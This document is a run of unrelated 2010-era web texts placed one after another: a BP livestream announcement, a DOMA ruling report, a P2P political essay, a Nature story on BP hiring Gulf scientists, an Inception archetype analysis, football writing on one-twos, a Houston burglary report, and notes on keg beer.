Those are figures no civilized society should accept .
Contributing Editor Cathy Young blogs at cathyyoung.blogspot.com .
Discuss this article here .
Thursday , July 1 , 2010 | 8:27 AM
Labels : Google Grants Blog , Google Products
Today , July 1st , YouTube is teaming up with PBS NewsHour for an exclusive interview with Bob Dudley , President and CEO of BP ’s Gulf Coast Restoration Organization .
In a live session moderated by the PBS NewsHour ’s Ray Suarez , Mr. Dudley will respond directly to the public ’s questions about the ongoing oil spill in the Gulf of Mexico .
If your organization is interested in being part of the discussion , we welcome questions from you and your members .
You can ask BP questions about accountability , the clean - up plan , recovery efforts in the Gulf region , environmental impact , the status of the relief well drilling , the role of the U.S. government , the future of offshore drilling and of BP as a company , or any other topic on your mind .
Participate in the discussion by submitting questions and voting for the best ones using Google Moderator on youtube.com / citizentube .
The top questions will be posed in the live interview today , Thursday , July 1 , at 3:30 pm ET / 12:30 pm PT on CitizenTube .
Portions of the interview will also be aired Thursday evening on PBS NewsHour and available on YouTube .
We look forward to your submitted questions for this exclusive interview .
Dress warmly , gather some friends and family , and head outside to watch sand burn in the upper atmosphere .
There ’s nothing like a good meteor shower .
Fraser and Pamela explain this beautiful phenomenon : what causes them , the best storms and showers to watch for , and different types of meteors you might see .
Download Episode 8 : Meteor Showers .
Yes , the sky is falling .
( 13.5 MB )
Share Pin 7 Shares
A Boston judge has ruled that a federal gay marriage ban is unconstitutional since it precludes the right of states to define marriage .
U.S. District Judge Joseph L. Tauro ruled in favor of gay couples ’ rights in challenges to the 1996 Defense of Marriage Act , known as DOMA .
Massachusetts had argued that DOMA prevented gay married couples from having access to benefits such as Medicaid in Massachusetts , where same - sex unions have been legal since 2004 .
Tauro said the act forced the state to discriminate against its own citizens and violated the equal protection clause of the U.S. Constitution .
Tauro wrote :
This court has determined that it is clearly within the authority of the Commonwealth to recognize same - sex marriages among its residents , and to afford those individuals in same - sex marriages any benefits , rights , and privileges to which they are entitled by virtue of their marital status .
The federal government , by enacting and enforcing DOMA , plainly encroaches upon the firmly entrenched province of the state .
This ruling could set a precedent for other states if it is upheld on appeal ; plaintiffs ’ attorneys fully expect such an appeal from the Obama administration ..
So far , five U.S. states and the District of Columbia have legalized gay marriage .
Photo courtesy of Michael Lehet under Creative Commons 3.0 .
This is a modified version of a response to Daniel Araya in the p2p research mailing list , which Alex Rollin found publishable .
We are often asked how we relate to left and right politics , and how the p2p / commons preference relates to earlier political approaches such as socialism .
Here is a possible answer :
“ Communism was the dream of mostly European and other workers to have a world in which equal relations and full democracy would be possible , and part of the broad tradition of emancipatory thinking who wants to give every human an equitable chance …. it belongs in the same tradition as the french and the american revolutions .
As defined by Marx , it was both the real movement of the workers to transform their situation , and the end stage of human history as a classless and stateless form of society , where everyone would contribute freely and have access to abundant resources according to their needs .
It would be preceded by a transitional stage , socialism , where there would still be a conditional exchange between effort and reward , as long as society was determined by scarcity .
Communism defined in this way was not a collectivism , i.e. a theory of subsuming the individual to the collective , but rather based on the principle , like in mahayana buddhism , that the liberty of the individual is predicated on that of his brothers and sisters , in other words , nobody can really be free by enslaving others , or in a world predicated on exploitation of others .
In practice however , the left became dominated by statist approaches , in the form of the social democratic left , which wanted to reform the state within capitalism , and the Stalinist movements , which favoured a bureaucratic state presiding over state - owned enterprises and a hierarchically controlled society .
If the former slowly adopted to the existing society by becoming the left wing of liberalism , the latter was discredited both by its historical crimes , and the collapse of the Soviet system where it was once dominant .
The reasons why class society persisted , including in the state - capitalist or state - ‘ socialist ’ countries , is a complex one , to which I do not have a full answer , but I do think Marxism and socialism got the nature of the phase transition between succeeding systems wrong ( see below ) .
I ’m personally not sure that this dream of classlessness will ever be a reality , event thinking it as a unlikely possibility , and in any case I am not prepared to wait for it , but I think we can make substantial advances to a more equitable world order , not just because we can , but because we must , as the present infinite growth order is not compatible with our survival and that of the biosphere .
P2P is one attempt to formulate a narrative and a politics that can bring about such a change , by subsuming market dynamics ( but not capitalism which has no realistic chance to survive in the long run ) to a higher purpose and deeper social logic through the generation of commons .
In that , I honour the many previous attempts to achieve it , from many different sides , which for me includes that of the dead european philosopher mentioned above , but also many others , and I can see many emancipatory values and approaches in competing political points of view , including liberalism and some forms of conservatism ; and I recognize as primary enemies totalitarianism in all its forms , especially Stalinism in all its derivative forms .
Capitalism may be objectionable , but it is in many crucial ways preferable , especially in its democratic forms , to state - induced and imposed totalitarianism .
There ’s a lot more opportunity for p2p in the capitalist U.S.A than in Stalinist North Korea , there can be no doubt about this .
You ask , “ Tell me Michel , what technology , democratic practice , or medical innovation has a Marxist ever invented ? ” and of course the answer would be the same as for the masons or christians , many , as indeed many technologists , democrats , and healthcare pioneers have been Marxists , as others have been of different persuasions , though of course much less people espouse the label today .
Do you imagine that all the inventors in world history were all hayekians or schumpeterians ?
I would like to turn it around and make it personal as well : nothing you have today , your ability to study , etc .. would have been possible without the social struggles and sacrifices of the working men and women for social justice and a more equitable distribution of the social product , including in terms of education , anti-child labour laws , universal suffrage , etc …
Non of these things would have been achieved without the ‘ socialist ’ workers movement in the 19th and 20th century , along with other progressive social movements , such as say Gandhi in India , or the civil rights movement in the U.S.
None of these achievements were ‘ given ’ , or just a pure result of automatic prosperity .
Left on its own devices , capitalism eats itself , as we have again seen in 2008 , it is always up to the people to save it from itself and its own proclivities of taking from the many to give it to the few .
Then you ask :
Why in the history of experiments with communism was there no democratic communist state ?
You probably know the classic marxist answer , which is n’t mine , which is that this realization was supposed to happen in advanced western countries , the only one with the productive capacity to go beyond the scarcity paradigm , and when the many attempts failed , through violent suppression as well as internal contradictions , then successful power grabs could only happen in countries without that capacity , and hence quickly degenerated into new class systems to allocate the scarce resources .
Really existing socialism then , became in effect more like state - capitalism or state - socialism , another way to achieve industrial society , based on bureaucratic control and state ownership , but still involving capital accumulation , workers that did not own their means of production , consumers , etc …
My own answer , presented as the p2p hypothesis , is different .
First , I ’m not sure that classlessness is possible without a very long cultural and psychological maturation , and with only 2 % of the people at a peer to peer level of intersubjectivity ( susan cook greuter ’s statistics of human development ) , you can imagine what a long trip that would be .
Like the going beyond the ego of eastern enlightenment , I ’m not waiting for it .
Second , I think that Marxists got the change scenario wrong , as i have argued in a few texts such as “ To the Finland Station ” .
Phase transitions did generally NOT happen with a class taken over power from another , but from a dual transformation of both producing and managerial classes around a new productive paradigm .
It is only after a long maturation , through the stages of first emergence , then parity , that phase transitions occur as a change in the state form and in the dominant form of political power .
My analysis of the failure of socialism then , is that it did not fulfil the condition that Marx himself had put forward , i.e. that the old mode had exhausted its possibilities , and that a new productive mode makes it appearance .
Socialism , as it could exist in the 19th and 20th century , was not a superior and more productive mode of development .
Obviously , though the state - capitalist or state - socialist mode did have some successes , such as higher growth than its capitalist competitors for a number of years , it could not deal with technological complexity in the way capitalist democracies could ( and we will see how non-democratic capitalism like China will do on this score in the next 20 years ) , and it was thus NOT more productive than capitalism , and thus unable to overtake it .
But as I argue in my own work , peer production is hyperproductive in this sense , both economically , socially , and politically , and this is why there is a re-orientation of capitalism towards peer - production modalities today .
In my take today , this means an increasing turn of working people towards peer production , and a turn of a section of capital towards netarchical capitalism , through the joint modality of the commons .
So the phase transition towards peer to peer is not predicated upon the creation of classlessness , but on the becoming core of the commons as a social relation of commoning , while the remaining scarce good dynamics can still be allocated through the market and other modalities .
So the difference is that as the present system is based on competition , and within the competing entities on cooperation ( through the hierarchical wage relationship but also moderated through more and more horizontal networking ) , then in the future I envision , based on the already evident practice of existing commons , the core becomes cooperation through the commons , while competition exists between the different commons .
And we move from a system which cannot recognize externalities in its practice ( market transactions are by definitions outside this purview ) , to a system where externalities are build in .
Let me stress that this had nothing to do with collectivism … peer to peer is neither a return to premodern wholism , nor coercive cooperation in the stalinist version , but it is based on the free aggregation of individuals around the common creation of value through shared commons of knowledge , code , and design .
What then , is the position of ‘ p2 p ’ towards the right .
I have often stated that I believe peer to peer to be a dynamic of the left , as it seeks further emancipation , while the right generally seeks the continuation of existing social hierarchies ( more precisely , there is of course also a reactionary right that seeks a return of older hierarchical forms , and a revolutionary right which seeks the imposition of new hierarchies , like Fascism attempted ) .
Nevertheless , we can find conservative and liberal traditions which have a place for p2 p and commons - oriented dynamics , and in my view it might be possible to unite people of different political backgrounds around concrete common priorities .
Take as one example , catholic Distributism , or the stress of the Red Toryism of Phillip Blond on civil society , mutualities and cooperatives .
Free software is a good practical example , as it does n’t require a specific political stance to work .
Commons can therefore be made to work , and p2p dynamics be made to expand , without requiring any adherence to political principles proposed by the left , as the people of the right also often have a place for community , the commons etc …
More importantly , most people are not always consistently on one side in all their convictions , but often mash - up different preferences .
If we ever want to achieve a political and social majority for a phase transition to a commons - based society , then we will need a very broad social alliance .
The Eken M001 tablet is an Android 1.6 - running , 7 - inch touchscreen tablet , and it can be yours for the low low price of $ 108.76 .
This one comes out of China and features a 600MHz processor , 2GB flash memory , expandable SD storage , and Wi-Fi connectivity .
Sure there are better tablets on the horizon and other options currently available , but for the price you ca n’t really argue .
Unless you want to say something about Android 1.6 , then you can argue .
But , hey , I ’m just the messenger .
Check it out over at DealExtreme .
Published online 28 July 2010 | Nature 466 , 538 ( 2010 ) | doi:10.1038/466538a
News
Scientists call for impartial funding and open data as BP and government agencies contract researchers .
Wildlife are suffering in the Gulf of Mexico .
S. GARDNER / REUTERS
It started with a story in the Press - Register of Mobile , Alabama .
On 16 July , the paper reported that beleaguered oil giant BP was hurriedly signing up scientists to gather data for the company , to aid its defence in cases arising from the Deepwater Horizon spill .
The catch was that these lucrative contracts also restricted the scientists ' freedom to publish their research .
Within a week , headlines around the world were accusing BP of ' gagging ' scientists .
But researchers in the Gulf of Mexico region describe a more complex situation .
Scientists , they say , are being trapped in the middle of a scramble by BP and the federal government to round up expert witnesses .
The rush is being driven by the Natural Resource Damage Assessment ( NRDA ) , a process defined by US federal law , in which those responsible for the spill , along with state and federal agencies , collect data to assess the environmental impact of the accident .
Government agencies typically rely on their own scientists , whereas responsible parties consult with firms that have in - house scientific expertise , says Michael Wascom , a coastal and ocean management lawyer at Louisiana State University ( LSU ) in Baton Rouge .
The size of this spill is unprecedented , however , so academic scientists are increasingly being called on .
Because the NRDA is part of a legal process , the scientists ' results are unavailable for public review .
" When you collect data for the [ NRDA ] and agree to analyse them , you are essentially foreclosing on your ability to publish those data because they 're going to be involved in court cases and they 're subject to all kinds of sequestering and gag orders , " says Ian MacDonald , an oceanographer at Florida State University in Tallahassee .
Some universities have bridled at the restrictions .
In early June , lawyers representing BP contacted the University of South Alabama in Mobile , asking to set up contracts with scientists in the Department of Marine Sciences .
According to Russ Lea , the university 's vice - president for research , the terms that BP suggested sounded " very unfavourable and very non-transparent " regarding academic freedoms .
Data collected by scientists under contract would be confidential , and could not be published for three years , says Lea .
" Our rejoinder was that we are more than happy to work with BP or with anybody else , but it 's going to be with full academic freedoms , " he says .
They never heard from BP 's lawyers again .
Yet Lea adds that BP 's desire to hire experts is not particularly egregious — it can happen in any big lawsuit .
“ We are more than happy to work with BP or with anybody else , but it 's going to be with full academic freedoms . ”
The National Oceanic and Atmospheric Administration ( NOAA ) has a similar position on its NRDA contracts .
" We will not hire anyone who refuses to sign a confidentiality agreement and could jeopardize the NRDA process , " says spokesperson Rachel Wilhelm .
But she adds that on 8 July , NOAA decided to waive parts of the agreements and allow scientists to publish their data .
" Releasing NRDA ' Preassessment ' science data is rarely done in the NRDA process , but it was decided in the interest of transparency , and because of the heightened interest in this particular spill , that this information would be made public , " says Wilhelm .
BP lawyers had also approached the Gulf Coast Research Lab in Ocean Springs , part of the University of Southern Mississippi , about contracting the entire lab .
When the lab 's administration declined , BP sought out individual researchers there , including Joe Griffitt , an aquatic toxicologist .
Griffitt says he was among about half a dozen faculty members who signed a BP contract to assess damages and design their spill - response plan .
" We thought we could do some good by making sure they had good science underpinning their plan , " he says .
Griffitt says that the researchers specifically stated in their contracts that they would not accept any restrictions on publishing research related to the spill .
But after a few days of reflection and further discussion with BP 's lawyers , they became aware that consulting for BP would bar them from working with federal agencies under the NRDA process , raising concerns that they might be prevented from applying for federal funding altogether .
The researchers then unanimously resigned from their contracts , says Griffitt .
BP spokesman Mark Salt says that the company has contracts with " more than a dozen " researchers with expertise in the region , and that it has asked them to " treat information from BP counsel as confidential " .
But , says Salt , " BP does not take the position that environmental data are confidential .
Moreover , BP does not restrict academics speaking about scientific data . "
However , Salt admits that " a few of the contracts between our local counsel and local university experts contain a three - year restriction on publication .
It is BP Legal 's intent to remove those restrictions , so that all university and college experts are hired on the same terms . "
The cost of openness
Several scientists contacted by Nature say the episode highlights the lack of spill - research funding that is independent of the NRDA .
" We need to get information debated within the scientific literature , " says MacDonald .
ADVERTISEMENT
BP has pledged US$ 500 million in research funding through its Gulf of Mexico Research Initiative ; $ 30 million of this has already been split between several Gulf Coast institutions , and is not tied to the NRDA .
The National Science Foundation has provided more than $ 3 million in rapid - response funds for oil - spill research , and the Louisiana Sea Grant , administered by NOAA , has offered $ 100,000 .
But these sums are not enough to match the scale of the problem , experts say .
Operating a ship with a robotic vehicle costs about $ 50,000 per day , says Robert Carney , a biological oceanographer at LSU .
" We need a federal source of funding very badly that does not have anything to do with the NRDA settlement , " adds Chris D'Elia , dean of the School of the Coast and Environment at LSU .
" The federal government is abdicating what I think is a critical role to provide opportunity for funding impartial , peer - reviewed research . "
Wilhelm says that NOAA is currently reviewing the issue of long - term funding for spill studies , and evaluating " what else is needed to obtain a more thorough scientific understanding of the damage to the Gulf " .
See also http://nature.com/oilspill
SPOILER WARNING :
What follows should only be viewed by people who have already seen Inception .
It contains heavy , critical spoilers which will impact your viewing of the film .
If you have n’t seen Inception yet , stop reading and do n’t come back until you do .
Mal / The Shade as The Shadow Archetype
Arthur / The Point Man as The Hero Archetype
Saito / The Tourist as the Father Archetype
Eames / The Forger as The Trickster Archetype
Robert Fischer Jr. / The Mark as The Child Archetype
Ariadne / The Architect as The Anima Archetype
Miles / The Mentor as The Wise Old Man Archetype
Yusef / The Chemist as The Self
When Christopher Nolan first announced that he was making a movie that took place “ within the architecture of the mind , ” I got nervous , really nervous .
This was n't because it meant that I would soon have to think at the multiplex , but because I had been working on a book of my own for the past three years that dealt with a universe within the mind , and I thought , uh oh , he 's going to steal my thunder .
Well , came out this past weekend and it could n't have been farther from what my book is about .
But in my boning up on dreams , I studied a great deal of the Swiss psychiatrist , Carl Jung , who is arguably most famous for his work on dream analysis , with the collective unconscious and archetypes being two of his most studied discussions .
Now , I 'm not claiming to be an expert in Jungian concepts such as the self or the collective unconscious ( And I 'll even direct you to two links that might describe it better than I can : here and here ) but in a nutshell , Jungian Archetypes are basically the rawest , innermost characteristics of ourselves that exist within everybody at the deepest level of the collective unconscious , which is basically the deepest realm within ourselves .
And in watching , I think I definitely saw something of Jungian archetypes in all of the characters who interact with Leonardo DiCaprio's , Dom Cobb , in the movie .
So much so , in fact , that I actually think :: Spoiler alert : : that the entire film might actually just be Dom Cobb 's dream and that all of the main characters in it were just different segments of himself that had to concoct an elaborate mission just so he could reach some level of catharsis within himself .
When the mission was completed , he was finally able to confront his demons and he was granted the clarity to finally see his children 's faces in the end because his guilt had finally been resolved amongst his archetypes .
I know , I know , it 's a pretty crazy theory and I 'm sure you 'll hear even crazier ones in the weeks that follow , but just hear me out for a little bit and maybe you 'll see where I 'm coming from with this .
But for a moment , I 'm going to attempt to examine the characters ofusing the methods of dream experts .
Here 's what I think they'd have to say .
One of Jung 's most prominent archetypes is the shadow , which is mostly the darker side of oneself projected into an entity .
This archetype can be represented as many different figures , from people to animals that might have haunted you in your childhood .
The way archetypes work is like this : they are n't really the shape that you see but more a feeling or emotion that is transformed into an entity that we can relate to , and the shadow archetype represents the worst parts of ourselves and the evil that lurks within us .
So , if you 're still following me here , then you 'll know that Mal is certainly the evil that lurks within Dom .
I mean , it 's even in her name , ( Mal in Latin means evil , after all ) .
But let 's look even deeper .
As we know , Mal is already dead by the first time we see her in Saito 's dream on the Shinkansen .
She killed herself after she thought that limbo was still reality and that the world she lived in was all a lie .
As we know , she only thinks this because Dom Cobb performed Inception on her and he feels that he is the cause of her death , so his dark side is manifested in Mal , who might as well just be a literal shadow because she follows him everywhere he goes , much like a shadow would .
This leads to disastrous results , like in the form of a freight train through the streets or as an assassin in the snow .
Mal in every way is the darker side of Cobb that he can't contain , and that 's what makes her such a threat , because deep down , he knows that she 's really the worst side of himself , and everything she does affects the rest of his innermost archetypes .
Let 's face it , even though Dom Cobb is the star of the show , he 's hardly the hero .
He 's more like a broken down sad sack dealing with shameful emotional issues caused by his dominant shadow ( See above ) .
But Arthur , who is willing to take on an onslaught of bad guys in a constantly shifting hallway so his friends can enter into a deeper dream state , is pure hero material , especially when he runs the risk of being “ killed ” and sent to limbo in such a heavily sedated state .
Arthur is everything Dom wishes he could be but can't because he has so many ghosts following him around .
He gets to kiss the girl , save the day ( Notice that he 's one of the first ones to wake up in the submerged car and pull the others to safety ) , and does n't fail in his mission to lead the bad guys away from his friends .
While Dom , on the other hand , fails in every way , even allowing his shadow / Mal to “ kill ” Fischer Jr. from behind , which compromises the entire mission .
So , if we 're keeping track of our Archetype discussion , that would mean that Arthur is also Dom , but the part of him that is brave and courageous and willing to put his life on the line for his friends .
He does n't have any excess baggage .
He 's just all business , and all kickass .
The father archetype is a very strong figure in the human psyche , as it's one that gets what it wants and has a great deal of control in the person he inhabits .
And in every way , that 's what Saito is , acting almost as a dues ex machina by the end of the film with his ability to literally overturn the law so that Dom can return to America .
Saito would be the side of Dom 's character that would be authoritative and demanding .
In other words , he would be the boss when it got right down to things .
We already see that Dom 's not the boss of his own team as his second architect does n't even follow his instructions when he tells her not to go deeper into his mind .
She does just that and sees what Mal is really capable of doing within him .
So in that way , Dom has very little control over his circumstances , while Saito is exactly the opposite — he gets what he wants and knows how to get it .
Note that not only did he convince Dom to plant inception in a business competitor 's mind , but he also got to tag along with the others as a tourist , which is highly dangerous and a definite risk factor in a mission like this .
Saito gets whatever he wants .
So is it any wonder why he gets shot so early in the mission ?
Dom can't deal with a figure like that right now within himself , as he has his own problems to deal with .
If anything , he needs a strongly based mother archetype , one who will take care of him and not demand too much out of him .
Unfortunately , there is n't one to be found in this movie , making his catharsis that much harder .
The Trickster Archetype is deceptive and shady , and Eames is the shadiest of them all .
Working as a forger in reality and as a shape shifter in the dream world ( even switching genders at one point to lead the target off - guard , which is VERY Trickster - esque ) , Eames is the side of Dom that can still laugh at itself and crack a smile , but also the great deceiver that can't tell reality from a dream .
The Trickster is very prominent in the film in that Dom lies to not only his team but also himself , believing that he has everything under control when he knows deep down that he 's a complete and utter mess .
It 's in Eames ' dream in the snow fortress that Dom is truly confronted with his shadow , and it's at that point that he knows that he can't lie to himself anymore .
The Trickster proves it to him by putting his shadow front and center there for him .
And with his shadow “ killing ” Fischer , she is also killing the child within him ( More on that in a second ) .
Robert Fischer Jr. just wants acceptance from his father , and like the child archetype , he is the side of Dom who desires to be innocent again .
Note that when Fischer 's safe opens , he pulls out the pinwheel that he had in the picture with his dad .
This side of Dom is very tricky to discuss as Dom actually deceives the child within him by lying to Fischer at the bar and claiming that the images he sees are really trying to kill him when their purpose is to actually save him from dream thieves , Dom being one of them .
This leads me to believe that Dom is trying to move on from the helpless side of himself by this part in the movie and does n't want that innocence to hold back .
He wants to be more like the father archetype and have control .
But Dom can't reach catharsis by subduing his archetypes , and by bringing Fischer back from the dead in the end , it allows him to open his safe , which I definitely think is tantamount to Dom 's rebirth , which is a part of what the child archetype represents within the dreamer , a new beginning .
So yeah , it 's some pretty heady stuff .
The Anima is the feminine side within a male ( Whereas , the animus , would be the male side within a female ) and she represents who a male truly is rather than who he presents himself as in reality , and in many ways , what that 's what Ariadne represents for Dom .
Out of all the other characters in the movie , she 's the closest to being who he really is — note , all of the details he tells her are basically the same details he 's telling us , too , with the audience being a part of who he is , as well , being that we 're living inside his head while we watch the movie — and she 's also an architect , which Dom once was too before his shadow became overbearing .
Think about it , it 's Ariadne who goes with him into limbo when everyone else has to stay behind .
She 's the one who tries to pull him away from his darker side and get him to move on so he can be himself again .
She 's basically a young Cobb with a vagina .
I do n't know how else to explain it .
Miles , Dom 's father - in - law , is the wise old man within himself , and believe it or not , this might be the most complex archetype of all to explain .
This is almost a paradox of sorts really ( Like those twisting stairs in the movie ) , in that he is both knowledge incarnate , but also the teacher within himself that is able to take in his anima as a student .
I do n't know .
I really can't wrap my head around this one .
Maybe you can do a better job .
The self represents both the conscious and the unconscious worlds within oneself , and that 's what Yusef is in this mission for Dom .
He is both the link to reality and the also harbinger into the dream world .
By being the initial dream that his team enters within , believe it or not , I think Yusef might be the closest to who Dom really is as an individual by having all of these archetypes swimming inside himself .
Remember , Yusef is the only other one who knows about Limbo on the onset , as Dom must have been dabbling with chemicals himself to get to that sort of state with his wife .
So it is in Yusef that we have the whole to the other segmented sections of Dom , and by allowing his other archetypes to sink deep within him , he is allowing them to all come to grips with each other .
Whoo , that was a lot of mental calisthenics right there .
What do you think ?
Can you piece the puzzle together any better ?
NB : for the purposes of this article we have used the strictest definition of " one- two " : i.e. that the return pass must be played first time .
This rules out such gems as Junior against Argentina in 1982 , and Archie Gemmill against Arsenal in 1978
When someone is as charismatic and ostentatious as Johan Cruyff , it is easy to be seduced into giving credit where credit is n't due .
That is certainly the case when it comes to Cruyff 's famous tap penalty with Jesper Olsen in 1982 .
We are not saying that Cruyff is guilty of stealing the copyright , for Johan is an honourable man , but it is certainly the case that most perceive him – erroneously – as the inventor of this ingenious manipulation of the rules .
In fact the first known instance came from the Belgian pair of " Rik " Coppens and André Piters in a World Cup qualifier against Iceland in 1958 .
Belgium were leading 6 - 1 at the time , which cut him a certain slack if , say , he 'd ballsed it up completely .
Not that he did .
Coppens , Belgian football 's greatest maverick ( insert your own joke here ) flagged the plan to Piters by saying simply " en deux temps " ( literally " in two times " ) .
The execution may look a little clumsy , but then Adam and Eve were n't exactly producing the Kama Sutra from the get - go .
This was still groundbreaking , immensely imaginative stuff ; all of which makes Coppens 's low - key celebration , akin to a gruff post - coital rollover , even more endearing .
He deserves to have pride of place in the pantheon of footballing innovation , but that place has been taken by Cruyff .
Now if someone could just uncover footage of some hairy - arsed joker doing a " Cruyff " turn for Grimsby in 1968 ...
It is entirely logical that high - class strike partnerships , particular those of a telepathic nature , should specialise in one - twos .
Here we might cite Andy Cole and Dwight Yorke ; in Manchester United 's Treble season , they were the give - and - go that kept on giving .
And going .
The pick was that remarkable goal in Camp Nou , when they cut devastatingly through Barcelona 's defence like a swish of Zorro 's blade ( admittedly the last defender was Samuel Okunowo , who would end up playing at Waltham Forest , but it 's still a delicious goal ) .
However , the Joy of Six would be unutterably tedious if we just picked six obvious examples each week , so we 've gone for a lesser - known pair who had an equally powerful sixth sense : Sunderland 's G - Force of Marco Gabbiadini and Eric Gates .
There were more than 12 years between them , but the chemistry was palpable – so much so that , when a Gabbiadini lookalike did that " We wanna be tugevva ! "
Prudential advert , it was n't hard to envisage an equivalent with him and Gates .
Between them they scored 42 goals when Sunderland were promoted to the top flight in 1989 - 90 .
The most celebrated came in their epic play - off semi-final victory over Newcastle .
Having drawn the first leg 0 - 0 at Roker Park – when , and you 'll like this link , Paul Hardyman responded to missing a last - minute penalty by trying to boot John Burridge 's head into Row Z – they deservedly won 2 - 0 in the return at St James '
Park , a result every bit as celebrated as their 2 - 1 win in the rain in 1999 .
The clincher came five minutes from time , with Gates 's disguised return allowing Gabbiadini to ease the ball into the far corner .
It was their penultimate game together , and the last goal for which they would combine .
It was a pretty fitting legacy .
The one - two is such a precise operation , with so little margin for error , that to get two in quick succession is extremely rare .
The flip - side of this is that , when the one - two - three - four comes off , the result is invariably glorious .
Germany scored a wonderful opening goal in the Euro 2008 quarter - final against Portugal , while Diego Maradona 's perfect finish and maniacal celebration against Greece in 1994 occasionally obscures the dizzying build - up , tiki - taka on steroids .
Then there is Tomas Brolin 's sumptuous winner against England at Euro 92 , a meandering Etch A Sketch through Graham Taylor 's side , culminating in a glorious , improvised finish .
The great Barry Davies captured the hypnotic nature of the move perfectly with his commentary : " Brolin , Dahlin , Brolin ... brilliant ! "
It 's common practice in England to laugh at Brolin , even though he achieved more at international tournaments than any Englishman of the last 20 years , but nobody was laughing that night .
The tedious and dismally transparent revisionism surrounding Eric Cantona 's role as the most influential player in English football history makes one fundamental mistake : to judge him by the standards of today , rather than the standards of his day .
In the inaugural season of the Premier League , the product was pretty grey ; the only fantasy football came from that new management game hosted by Dominik Diamond on Radio 5 Live .
Cantona changed all that .
He catalysed not one but two generations of Manchester United players , making them realise what could be achieved through incessant practice and thinking so far outside the box that you did n't even know where the box was , and what the hell 's a box anyway .
He was the Michael Hutchence to their Kylie Minogue , opening their minds in ways they did not think possible .
The most erotic lesson came in United 's first league game of 1993 , a 4 - 1 defenestration of a decent Tottenham side that set the agenda for a year of staggering achievement .
In both 1992 and 1993 , United played 43 league games .
In 1992 , largely without Cantona , United won 17 games and amassed 67 points ; in 1993 they won 31 and amassed 102 .
You do the math .
United were 1 - 0 up thanks to a Cantona goal when he made the second with a return pass of barely fathomable imagination and technique .
As Denis Irwin played the ball square , and the Spurs defence charged out like seagulls following the wrong trawler , Cantona instinctively realised that he could not go through or around the brick wall ; instead he went over it with the most insouciant of stabbed chips that was collected by Irwin and rammed high into the net .
The BBC commentator John Motson screamed : " This man is playing a game of his own . "
Motson got only one thing wrong .
This was not a man , this was Cantona .
The moment was rich in symbolism .
As well as liberating the current and future Manchester United XIs , the crowd now also realised the extent of what the team might achieve with Cantona .
With this pass began a relationship between player and disciples of such an enduring and spiritual nature that only the ignorant or envious would seriously try to compare it with any other in the history of sport .
Such a love - in is hard for outsiders to accept , which might explain the revisionism .
Either that or they just have n't forgiven him for the perceived sin of kung - fu kicking a gobby Cockney .
But , as Cantona showed with this pass , he had more than one way to skin a Cockney .
Modern footballers endeavour to play between the lines .
Franz Beckenbauer played between the sides – and not once did he touch them , so smooth was his work .
Has there ever , in either sense of the word , been a cooler footballer ?
If you dropped a marmot in the bath he would n't even twitch an eyebrow .
As the greatest libero of all he picked pockets without anyone noticing ; and as a young attacking midfielder of seriously high class – he scored seven goals in his first 13 appearances for West Germany – he penetrated opposing defences with the silkiest sojourns from midfield .
The best came against Switzerland in the 1966 World Cup .
The goal is a perfect example of a one - two in which the return pass draws two defenders towards the attacker , allowing him to burst through and score ( see also Ruud Gullit 's emphatic masterpiece against Ireland in 1990 ) .
Beckenbauer finished with the soft skill of an expert surgeon .
Switzerland did n't feel a thing .
Sometimes a great goal just happens to have a one - two in it .
Roberto Baggio 's languorous solo against Czechoslovakia at Italia 90 starts when he plays a neat wall pass with Giuseppe Giannini , but that is unsurprisingly lost in what follows .
That might have been true of a 21 - year - old Glenn Hoddle 's masterpiece against Manchester United , so stunning is every aspect of the volley – from the contortion of his body to the technique of the strike to the way the ball bounces straight back out of the net off the back stanchion – but the one - two is also textbook stuff .
Hoddle 's stab round the corner and spin completely befuddles the defender , while an off - balance Ardiles does extremely well to manufacture a return .
Had Hoddle then taken a touch and scuffed the ball in it would still have been a fine goal ; with a finish like that , it went straight into the top drawer .
The teenage son of a Harris County deputy constable opened fire with his father 's automatic rifle Tuesday after burglars forced their way into the family 's home , authorities said .
The boy , 15 , and his sister , 12 , were alone about 2:30 p.m. when they heard glass breaking downstairs at the home in the 2600 block of Royal Place Court in northwest Harris County .
The boy went downstairs with the rifle and spotted the two burglars in the living room .
He fired several shots and struck one of the intruders , said Lt. Jeff Stauber with the Harris County Sheriff 's Office .
" He was concerned with protecting his younger sister — that 's exactly what he did , “ Stauber said .
The suspect who was shot -- identified as Kinzy Evans , 17 , -- was struck several times by gunfire .
Police said his accomplice was a 16 - year - old who they would not identify because he is a juvenile .
Sheriff 's investigators were tipped off when the suspected burglars quickly showed up at Methodist Willowbrook Hospital .
" Anytime you get a gunshot victim in the hospital , they 're going to notify law enforcement , " Stauber said .
Evans was taken by Life Flight helicopter to Memorial Hermann - The Texas Medical Center in unknown condition .
Deputies brought the juvenile back to the brick home at the end of a cul - de-sac for additional questioning .
Sheriff 's deputies said the burglars came into the house after breaking out a window in the living room area .
" They left the same way they came in - through the broken window , " Stauber said .
' A little shaken up '
Family members at the scene declined to comment about the incident .
" The main thing is that the kids are OK .
They 're a little shaken up , " said a man who identified himself as the deputy constable 's brother .
Neighbors said several homes in the area also have been broken into during the daylight hours .
" There have been a lot of robberies .
It 's good that they caught them , " said Ushantha Kawmini , whose home down the street was burglarized about a month ago .
Break - in concerns
Another neighbor was concerned that the burglars would be brazen enough to break into a home belonging to a law enforcement officer .
" Now they 're doing it to the police officers .
What about regular people ? " said the neighbor .
She identified herself only as Mary because she feared retaliation from other burglars .
" I 'm sure they ( the suspects ) have got friends , " the neighbor said .
The two have been charged with burglary of a habitation , officials said .
mike.glenn@chron.com
Non-Pasteurized
For the most part keg beer brewed and packaged in kegs in the U.S. is not pasteurized .
During the packaging process non-pasteurized draft beers are sterile filtered and chilled to the point that any surviving bacteria , which could ferment the beer , become dormant .
Kegs are kept cold ( < 50° F ) from the brewery to the point of dispense .
Draft beer dispensed from a keg should be fresh by storing as short as possible , and serving cold at 38° F .
Temperatures above 38° F may promote non pasteurized draft beers to turn sour or cloudy .
Should the temperature rise above 50° F , the dormant bacteria which ferments and spoils beer will once again become active and , subsequent growth will rapidly begin to spoil flavor and cloud the beer .
Pasteurized
Most of the keg beer brewed and packaged outside the U.S. ( Import beers ) , are heat pasteurized during packaging .
This process kills off the bacteria that ferment and spoils the beer .
Pasteurized draft beer kegs can be transported and stored at room temperature .
The beer in these kegs can be flash cooled at the point of dispense .
However , most imported kegs are stored and dispensed at the same temperature ( 38° F ) as domestic , non-pasteurized kegs .
The social crisis in Appalachia
Part 1 : Deprivation and inequality in the coalfields
By Naomi Spencer
22 July 2010
